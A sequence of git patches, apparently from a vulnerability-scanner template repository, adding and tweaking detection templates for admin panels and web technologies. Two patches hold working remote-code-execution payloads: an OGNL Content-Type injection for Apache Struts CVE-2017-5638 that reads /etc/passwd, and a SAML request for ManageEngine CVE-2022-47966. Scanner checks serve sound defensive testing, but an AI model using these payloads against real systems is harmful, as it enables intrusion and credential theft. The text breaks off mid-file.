insertion(+) diff --git a/.new-additions b/.new-additions index 8a8bf189fe..87b0c9c3d5 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ cves/2010/CVE-2010-1429.yaml cves/2017/CVE-2017-11165.yaml cves/2018/CVE-2018-11227.yaml cves/2018/CVE-2018-11473.yaml +cves/2020/CVE-2020-23697.yaml cves/2022/CVE-2022-0234.yaml cves/2022/CVE-2022-28117.yaml cves/2022/CVE-2022-29153.yaml From 374777c0b906c0cbc02e86deb1b12eea98662774 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 18 Jan 2023 13:54:34 +0530 Subject: [PATCH 1013/1133] workflow fix --- .github/workflows/templates-stats.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 2bbf639947..1511b56a12 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -18,8 +18,6 @@ jobs: uses: actions/setup-go@v3 with: go-version: 1.19 - check-latest: true - cache: true - name: Installing Template Stats run: | From 15466744dfe30a53860fd3b0e1bd7ac586804147 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 18 Jan 2023 13:59:15 +0530 Subject: [PATCH 1014/1133] added-redirect --- exposed-panels/sap-cloud-analytics.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/exposed-panels/sap-cloud-analytics.yaml b/exposed-panels/sap-cloud-analytics.yaml index 4c25956c01..c1dc3a1762 100644 --- a/exposed-panels/sap-cloud-analytics.yaml +++ b/exposed-panels/sap-cloud-analytics.yaml @@ -12,8 +12,10 @@ info: requests: - method: GET path: - - '{{BaseURL}}/' + - '{{BaseURL}}' + host-redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word From f93c30dbda6a2e2441320c9d50980cd400a950d6 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 18 Jan 2023 08:34:13 +0000 Subject: [PATCH 1015/1133] Auto Generated New Template Addition List [Wed Jan 18 08:34:13 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 87b0c9c3d5..5e70966e76 100644 --- a/.new-additions +++ b/.new-additions @@ -17,6 +17,7 @@ exposed-panels/modoboa-panel.yaml exposed-panels/monstra-admin-panel.yaml exposed-panels/mylittleadmin-panel.yaml exposed-panels/saltgui-panel.yaml +exposed-panels/sap-cloud-analytics.yaml exposed-panels/sap-successfactors-detect.yaml exposed-panels/storybook-panel.yaml exposures/backups/froxlor-database-backup.yaml From 93daac35472d84f1c5bc648a7606cb8373478347 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 18 Jan 2023 08:34:46 +0000 Subject: [PATCH 1016/1133] Auto Generated New Template Addition List [Wed Jan 18 08:34:46 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 5e70966e76..4a404f8e1b 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ cves/2010/CVE-2010-1429.yaml cves/2017/CVE-2017-11165.yaml cves/2018/CVE-2018-11227.yaml cves/2018/CVE-2018-11473.yaml +cves/2018/CVE-2018-16979.yaml cves/2020/CVE-2020-23697.yaml cves/2022/CVE-2022-0234.yaml cves/2022/CVE-2022-28117.yaml From a6bb2cfc9c8cfe607ffe9eb5770440c0da8c84fb Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 18 Jan 2023 08:35:45 +0000 Subject: [PATCH 1017/1133] Auto Generated CVE annotations [Wed Jan 18 08:35:45 UTC 2023] :robot: --- cves/2020/CVE-2020-23697.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-23697.yaml b/cves/2020/CVE-2020-23697.yaml index 36c701cac4..51542a32ce 100644 --- a/cves/2020/CVE-2020-23697.yaml +++ b/cves/2020/CVE-2020-23697.yaml @@ -10,9 +10,12 @@ info: - https://github.com/monstra-cms/monstra/issues/463 - https://nvd.nist.gov/vuln/detail/CVE-2020-23697 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 cve-id: CVE-2020-23697 + cwe-id: CWE-79 metadata: - verified: true + verified: "true" tags: cve,cve2020,xss,mostra,mostracms,cms,authenticated variables: From a3f279530ba4c49391e85d4961e75d876e08dac5 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 19 Jan 2023 04:02:24 +0000 Subject: [PATCH 1018/1133] Auto WordPress Plugins Update [Thu Jan 19 04:02:24 UTC 2023] :robot: --- helpers/wordpress/plugins/advanced-custom-fields.txt | 2 +- helpers/wordpress/plugins/complianz-gdpr.txt | 2 +- helpers/wordpress/plugins/gutenberg.txt | 2 +- helpers/wordpress/plugins/nextgen-gallery.txt | 2 +- helpers/wordpress/plugins/ninja-forms.txt | 2 +- helpers/wordpress/plugins/optinmonster.txt | 2 +- helpers/wordpress/plugins/the-events-calendar.txt | 2 +- helpers/wordpress/plugins/w3-total-cache.txt | 2 +- 8 files changed, 8 insertions(+), 8 deletions(-) diff --git a/helpers/wordpress/plugins/advanced-custom-fields.txt b/helpers/wordpress/plugins/advanced-custom-fields.txt index e873808261..41bd15e2ea 100644 --- a/helpers/wordpress/plugins/advanced-custom-fields.txt +++ b/helpers/wordpress/plugins/advanced-custom-fields.txt @@ -1 +1 @@ -6.0.6 \ No newline at end of file +6.0.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/complianz-gdpr.txt b/helpers/wordpress/plugins/complianz-gdpr.txt index 4d1119ec4b..c0be8a7992 100644 --- a/helpers/wordpress/plugins/complianz-gdpr.txt +++ b/helpers/wordpress/plugins/complianz-gdpr.txt @@ -1 +1 @@ -6.3.9 \ No newline at end of file +6.4.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index 385495e93e..791fc94d82 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -14.9.1 \ No newline at end of file +15.0.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/nextgen-gallery.txt b/helpers/wordpress/plugins/nextgen-gallery.txt index 67f172f8ef..805df82f0d 100644 --- a/helpers/wordpress/plugins/nextgen-gallery.txt +++ b/helpers/wordpress/plugins/nextgen-gallery.txt @@ -1 +1 @@ -3.32 \ No newline at end of file +3.33 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ninja-forms.txt b/helpers/wordpress/plugins/ninja-forms.txt index 86f7d611d6..5058483853 100644 --- a/helpers/wordpress/plugins/ninja-forms.txt +++ b/helpers/wordpress/plugins/ninja-forms.txt @@ -1 +1 @@ -3.6.15 \ No newline at end of file +3.6.16 \ No newline at end of file diff --git a/helpers/wordpress/plugins/optinmonster.txt b/helpers/wordpress/plugins/optinmonster.txt index c200bec4af..c51908eafb 100644 --- a/helpers/wordpress/plugins/optinmonster.txt +++ b/helpers/wordpress/plugins/optinmonster.txt @@ -1 +1 @@ -2.11.1 \ No newline at end of file +2.11.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/the-events-calendar.txt b/helpers/wordpress/plugins/the-events-calendar.txt index 3034eb6b75..41bd15e2ea 100644 --- a/helpers/wordpress/plugins/the-events-calendar.txt +++ b/helpers/wordpress/plugins/the-events-calendar.txt @@ -1 +1 @@ -6.0.6.2 \ No newline at end of file +6.0.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/w3-total-cache.txt b/helpers/wordpress/plugins/w3-total-cache.txt index 4c22129092..c45a01dab7 100644 --- a/helpers/wordpress/plugins/w3-total-cache.txt +++ b/helpers/wordpress/plugins/w3-total-cache.txt @@ -1 +1 @@ -2.2.11 \ No newline at end of file +2.2.12 \ No newline at end of file From c28ea7eca590a32f40bffe7b7b6670c624cda7f4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 19 Jan 2023 18:14:54 +0530 Subject: [PATCH 1019/1133] fix-condition --- technologies/fingerprinthub-web-fingerprints.yaml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/technologies/fingerprinthub-web-fingerprints.yaml b/technologies/fingerprinthub-web-fingerprints.yaml index 8be593e73e..95698a9ff2 100755 --- a/technologies/fingerprinthub-web-fingerprints.yaml +++ b/technologies/fingerprinthub-web-fingerprints.yaml @@ -12875,12 +12875,10 @@ requests: - type: word name: openeuler - condition: and words: - # for Apache: <title>Test Page for the Apache HTTP Server on openEuler Linux - # for Nginx: Test Page for the Nginx HTTP Server on openEuler - - Test Page for - - HTTP Server on openEuler + - Test Page for the Apache HTTP Server on openEuler Linux + - Test Page for the Nginx HTTP Server on openEuler + condition: or - type: word name: ucap-search- From 01aa0aa9a1d6a4c8d026f5dd3ec10ddeb85e0c8e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 19 Jan 2023 21:27:27 +0530 Subject: [PATCH 1020/1133] Create rsshub-detect.yaml --- technologies/rsshub-detect.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 technologies/rsshub-detect.yaml diff --git a/technologies/rsshub-detect.yaml b/technologies/rsshub-detect.yaml new file mode 100644 index 0000000000..147b548327 --- /dev/null +++ b/technologies/rsshub-detect.yaml @@ -0,0 +1,22 @@ +id: rsshub-detect + +info: + name: RSSHub Detect + author: ritikchaddha + severity: info + metadata: + verified: true + shodan-query: http.favicon.hash:-1893514038 + tags: tech,rsshub + +requests: + - method: GET + path: + - "{{BaseURL}}/favicon.ico" + + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - "('-1893514038' == mmh3(base64_py(body)))" From 6994f1ebf61c6275c11a6494795660dec0e50126 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 19 Jan 2023 15:57:49 +0000 Subject: [PATCH 1021/1133] Auto Generated New Template Addition List [Thu Jan 19 15:57:49 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4a404f8e1b..d669dee740 100644 --- a/.new-additions +++ b/.new-additions @@ -46,6 +46,7 @@ technologies/default-symfony-page.yaml technologies/default-tengine-page.yaml technologies/monstracms-detect.yaml technologies/ntop-detect.yaml +technologies/rsshub-detect.yaml technologies/wordpress/plugins/otter-blocks.yaml technologies/wordpress/plugins/webp-express.yaml technologies/xerox-workcentre-detect.yaml From 8dd1b1c09db7a0c1f259aab60fc0341f8ddb4174 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha Date: Thu, 19 Jan 2023 21:29:47 +0530 Subject: [PATCH 1022/1133] Revert "Create rsshub-detect.yaml" This reverts commit 01aa0aa9a1d6a4c8d026f5dd3ec10ddeb85e0c8e. --- technologies/rsshub-detect.yaml | 22 ---------------------- 1 file changed, 22 deletions(-) delete mode 100644 technologies/rsshub-detect.yaml diff --git a/technologies/rsshub-detect.yaml b/technologies/rsshub-detect.yaml deleted file mode 100644 index 147b548327..0000000000 --- a/technologies/rsshub-detect.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: rsshub-detect - -info: - name: RSSHub Detect - author: ritikchaddha - severity: info - metadata: - verified: true - shodan-query: http.favicon.hash:-1893514038 - tags: tech,rsshub - -requests: - - method: GET - path: - - "{{BaseURL}}/favicon.ico" - - host-redirects: true - max-redirects: 2 - matchers: - - type: dsl - dsl: - - "('-1893514038' == mmh3(base64_py(body)))" From 1d523a3c44df8fe84c987a188210713d5b336a40 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 19 Jan 2023 16:00:23 +0000 Subject: [PATCH 1023/1133] Auto Generated New Template Addition List [Thu Jan 19 16:00:23 UTC 2023] :robot: --- .new-additions | 1 - 1 file changed, 1 deletion(-) diff --git a/.new-additions b/.new-additions index d669dee740..4a404f8e1b 100644 --- a/.new-additions +++ b/.new-additions @@ -46,7 +46,6 @@ technologies/default-symfony-page.yaml technologies/default-tengine-page.yaml technologies/monstracms-detect.yaml technologies/ntop-detect.yaml -technologies/rsshub-detect.yaml technologies/wordpress/plugins/otter-blocks.yaml technologies/wordpress/plugins/webp-express.yaml technologies/xerox-workcentre-detect.yaml From 09f5e909b7d8517f271485484ae56a56a019567d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 19 Jan 2023 21:30:50 +0530 Subject: [PATCH 1024/1133] Create rsshub-detect.yaml --- technologies/rsshub-detect.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 technologies/rsshub-detect.yaml diff --git a/technologies/rsshub-detect.yaml b/technologies/rsshub-detect.yaml new file mode 100644 index 0000000000..147b548327 --- /dev/null +++ b/technologies/rsshub-detect.yaml @@ -0,0 +1,22 @@ +id: rsshub-detect + +info: + name: RSSHub Detect + author: ritikchaddha + severity: info + metadata: + verified: true + shodan-query: http.favicon.hash:-1893514038 + tags: tech,rsshub + +requests: + - method: GET + path: + - "{{BaseURL}}/favicon.ico" + + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - "('-1893514038' == mmh3(base64_py(body)))" From f75c73c7c689ccf454719b8c8b1dfa7dc43b70ab Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 19 Jan 2023 23:03:20 +0530 Subject: [PATCH 1025/1133] Create auto_assign.yml (#6560) --- .github/auto_assign.yml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 .github/auto_assign.yml diff --git a/.github/auto_assign.yml b/.github/auto_assign.yml new file mode 100644 index 0000000000..df7cf8dab0 --- /dev/null +++ b/.github/auto_assign.yml @@ -0,0 +1,31 @@ +# Set to true to add reviewers to pull requests +addReviewers: true + +# Set to true to add assignees to pull requests +addAssignees: true + +# A list of reviewers to be added to pull requests (GitHub user name) +reviewers: + - ritikchaddha + - DhiyaneshGeek + - pussycat0x + - princechaddha + +# A number of reviewers added to the pull request +# Set 0 to add all the reviewers (default: 0) +numberOfReviewers: 1 + + # A list of assignees, overrides reviewers if set + assignees: + - ritikchaddha + - DhiyaneshGeek + - pussycat0x + +# A number of assignees to add to the pull request +# Set to 0 to add all of the assignees. +# Uses numberOfReviewers if unset. + numberOfAssignees: 1 + +# A list of keywords to be skipped the process that add reviewers if pull requests include it +# skipKeywords: +# - wip From 05c5f764d96bf48273b9c66c6457ce5dc8c7e6b0 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 19 Jan 2023 23:51:47 +0530 Subject: [PATCH 1026/1133] workflow fix --- .github/auto_assign.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/auto_assign.yml b/.github/auto_assign.yml index df7cf8dab0..29802160bf 100644 --- a/.github/auto_assign.yml +++ b/.github/auto_assign.yml @@ -17,9 +17,9 @@ numberOfReviewers: 1 # A list of assignees, overrides reviewers if set assignees: - - ritikchaddha - - DhiyaneshGeek - - pussycat0x + - ritikchaddha + - DhiyaneshGeek + - pussycat0x # A number of assignees to add to the pull request # Set to 0 to add all of the assignees. From db71a4510f7a7be8c682bca4d32a04ebc6b59067 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 19 Jan 2023 23:58:23 +0530 Subject: [PATCH 1027/1133] Create lucy-admin-panel.yaml (#6562) * Create lucy-admin-panel.yaml * more fix Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> --- .github/auto_assign.yml | 4 ++-- technologies/lucy-admin-panel.yaml | 32 ++++++++++++++++++++++++++++++ 2 files changed, 34 insertions(+), 2 deletions(-) create mode 100644 technologies/lucy-admin-panel.yaml diff --git a/.github/auto_assign.yml b/.github/auto_assign.yml index 29802160bf..812e1b874b 100644 --- a/.github/auto_assign.yml +++ b/.github/auto_assign.yml @@ -16,7 +16,7 @@ reviewers: numberOfReviewers: 1 # A list of assignees, overrides reviewers if set - assignees: +assignees: - ritikchaddha - DhiyaneshGeek - pussycat0x @@ -24,7 +24,7 @@ numberOfReviewers: 1 # A number of assignees to add to the pull request # Set to 0 to add all of the assignees. # Uses numberOfReviewers if unset. - numberOfAssignees: 1 +numberOfAssignees: 1 # A list of keywords to be skipped the process that add reviewers if pull requests include it # skipKeywords: diff --git a/technologies/lucy-admin-panel.yaml b/technologies/lucy-admin-panel.yaml new file mode 100644 index 0000000000..d831ce002b --- /dev/null +++ b/technologies/lucy-admin-panel.yaml @@ -0,0 +1,32 @@ +id: lucy-admin-panel + +info: + name: Lucy Security Admin Panel + author: ritikchaddha + severity: info + metadata: + verified: true + shodan-query: html:'title="Lucy' + tags: tech,lucy + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/admin/login" + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'title="Lucy"' + - 'aria-label="Lucy' + condition: or + + - type: status + status: + - 200 From 42a063ecc5ed7024d76f6ccdabed967a57affb63 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 19 Jan 2023 18:28:40 +0000 Subject: [PATCH 1028/1133] Auto Generated New Template Addition List [Thu Jan 19 18:28:40 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4a404f8e1b..dbf4b1666d 100644 --- a/.new-additions +++ b/.new-additions @@ -44,6 +44,7 @@ technologies/default-cakephp-page.yaml technologies/default-runcloud-page.yaml technologies/default-symfony-page.yaml technologies/default-tengine-page.yaml +technologies/lucy-admin-panel.yaml technologies/monstracms-detect.yaml technologies/ntop-detect.yaml technologies/wordpress/plugins/otter-blocks.yaml From c88c3bf66896e13c868ae85a36ea7abc52f3fb06 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 19 Jan 2023 18:39:49 +0000 Subject: [PATCH 1029/1133] Auto Generated New Template Addition List [Thu Jan 19 18:39:49 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index dbf4b1666d..37a6b0a244 100644 --- a/.new-additions +++ b/.new-additions @@ -47,6 +47,7 @@ technologies/default-tengine-page.yaml technologies/lucy-admin-panel.yaml technologies/monstracms-detect.yaml technologies/ntop-detect.yaml +technologies/rsshub-detect.yaml technologies/wordpress/plugins/otter-blocks.yaml technologies/wordpress/plugins/webp-express.yaml technologies/xerox-workcentre-detect.yaml From 72dae5337fa0fb97684d1602b9586320f659f4d0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 20 Jan 2023 00:33:25 +0530 Subject: [PATCH 1030/1133] Create machform-admin-panel.yaml --- exposed-panels/machform-admin-panel.yaml | 30 ++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 exposed-panels/machform-admin-panel.yaml diff --git a/exposed-panels/machform-admin-panel.yaml b/exposed-panels/machform-admin-panel.yaml new file mode 100644 index 0000000000..72f7f9b013 --- /dev/null +++ b/exposed-panels/machform-admin-panel.yaml @@ -0,0 +1,30 @@ +id: machform-admin-panel + +info: + name: MachForm Admin Panel + author: ritikchaddha + severity: info + metadata: + verified: true + shodan-query: title:"MachForm Admin Panel" + tags: panel,machform,admin + +requests: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'alt="MachForm"' + - 'MachForm Admin Panel' + condition: or + + - type: status + status: + - 200 From daffcbe88df00d8fbdd83624f7ef1a410501406a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 20 Jan 2023 01:29:16 +0530 Subject: [PATCH 1031/1133] Create CVE-2022-47966.yaml --- cves/2022/CVE-2022-47966.yaml | 90 +++++++++++++++++++++++++++++++++++ 1 file changed, 90 insertions(+) create mode 100644 cves/2022/CVE-2022-47966.yaml diff --git a/cves/2022/CVE-2022-47966.yaml b/cves/2022/CVE-2022-47966.yaml new file mode 100644 index 0000000000..929eb2e89a --- /dev/null +++ b/cves/2022/CVE-2022-47966.yaml @@ -0,0 +1,90 @@ +id: CVE-2022-47966 + +info: + name: ManageEngine - RCE + author: rootxharsh,iamnoooob,DhiyaneshDK + severity: critical + description: | + Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections. + reference: + - https://twitter.com/horizon3attack/status/1616062915097886732?s=46&t=ER_is9G4FlEebVFQPpnM0Q + - https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/ + - https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html + metadata: + verified: "true" + shodan-query: title:"ManageEngine" + tags: cve,cve2022,rce,zoho,manageengine + +variables: + cmd: ' + + + + + + a + + + + + + + + + + + + + + + + + + + + H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000= + + + +RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw== + + + +' + + +requests: + - raw: + - | + POST /SamlResponseServlet HTTP/2 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 + Origin: null + Content-Type: application/x-www-form-urlencoded + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.9,ru;q=0.8 + + SAMLResponse={{url_encode(base64(cmd))}}&RelayState= + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "dns" + + - type: word + part: body + words: + - "Unknown error occurred while processing your request" + + - type: status + status: + - 500 From 6c3626409bb774bb60e40c56d7148c7e99887cd5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 20 Jan 2023 01:56:44 +0530 Subject: [PATCH 1032/1133] lint-fix --- cves/2022/CVE-2022-47966.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/cves/2022/CVE-2022-47966.yaml b/cves/2022/CVE-2022-47966.yaml index 929eb2e89a..d0260110a1 100644 --- a/cves/2022/CVE-2022-47966.yaml +++ b/cves/2022/CVE-2022-47966.yaml @@ -51,14 +51,12 @@ variables: H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000= - RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw== ' - requests: - raw: - | From 2a558fd3d5287cacce8b215bc2c7720ae4b6855c Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 19 Jan 2023 17:07:50 -0500 Subject: [PATCH 1033/1133] Update akamai-s3-cache-poisoning.yaml URL no longer available, update using webarchive. --- misconfiguration/akamai/akamai-s3-cache-poisoning.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml b/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml index 7de4ada050..2eeded9ef0 100644 --- a/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml +++ b/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml @@ -5,7 +5,7 @@ info: author: DhiyaneshDk severity: high reference: - - https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/ + - https://web.archive.org/web/20230101082612/https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/ - https://owasp.org/www-community/attacks/Cache_Poisoning metadata: verified: "true" From 06bdca7b779a112e2aaf79ba219d2464030135f3 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Thu, 19 Jan 2023 18:48:33 -0500 Subject: [PATCH 1035/1133] Update CVE-2017-5638.yaml --- cves/2017/CVE-2017-5638.yaml | 27 ++++++++++++++++++--------- 1 file changed, 18 insertions(+), 9 deletions(-) diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml index 5da6dbb20d..e3f4e2add2 100644 --- a/cves/2017/CVE-2017-5638.yaml +++ b/cves/2017/CVE-2017-5638.yaml @@ -19,17 +19,26 @@ info: requests: - raw: - - | + - |+ GET / HTTP/1.1 Host: {{Hostname}} - Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1 - Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data - Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* + Content-Type: %{(#tess='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd="cat /etc/passwd",#cmds={"/bin/bash","-c",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())} + Cache-Control: max-age=0 + Upgrade-Insecure-Requests: 1 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.9 + Connection: close + unsafe: true + matchers-condition: and matchers: - - type: word - words: - - "X-Hacker: Bounty Plz" - part: header -# Enhanced by mp on 2022/04/26 + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 From 2c6944fdc390d98140a4a9873c8eeeddb1119803 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Thu, 19 Jan 2023 19:04:40 -0500 Subject: [PATCH 1036/1133] Update CVE-2017-5638.yaml --- cves/2017/CVE-2017-5638.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml index e3f4e2add2..b6298cb04b 100644 --- a/cves/2017/CVE-2017-5638.yaml +++ b/cves/2017/CVE-2017-5638.yaml @@ -23,7 +23,6 @@ requests: GET / HTTP/1.1 Host: {{Hostname}} Content-Type: %{(#tess='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd="cat /etc/passwd",#cmds={"/bin/bash","-c",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())} - Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 From d1df6991c68b884d61e4effad5515ee159bb27fe Mon Sep 17 00:00:00 2001 From: sergheusz Date: Thu, 19 Jan 2023 22:49:01 -0300 Subject: [PATCH 1037/1133] add template mylittlebackup-panel --- exposed-panels/mylittlebackup-panel.yaml | 31 ++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 exposed-panels/mylittlebackup-panel.yaml diff --git a/exposed-panels/mylittlebackup-panel.yaml b/exposed-panels/mylittlebackup-panel.yaml new file mode 100644 index 0000000000..9ab5f004b6 --- /dev/null +++ b/exposed-panels/mylittlebackup-panel.yaml @@ -0,0 +1,31 @@ +id: mylittlebackup-panel + +info: + name: 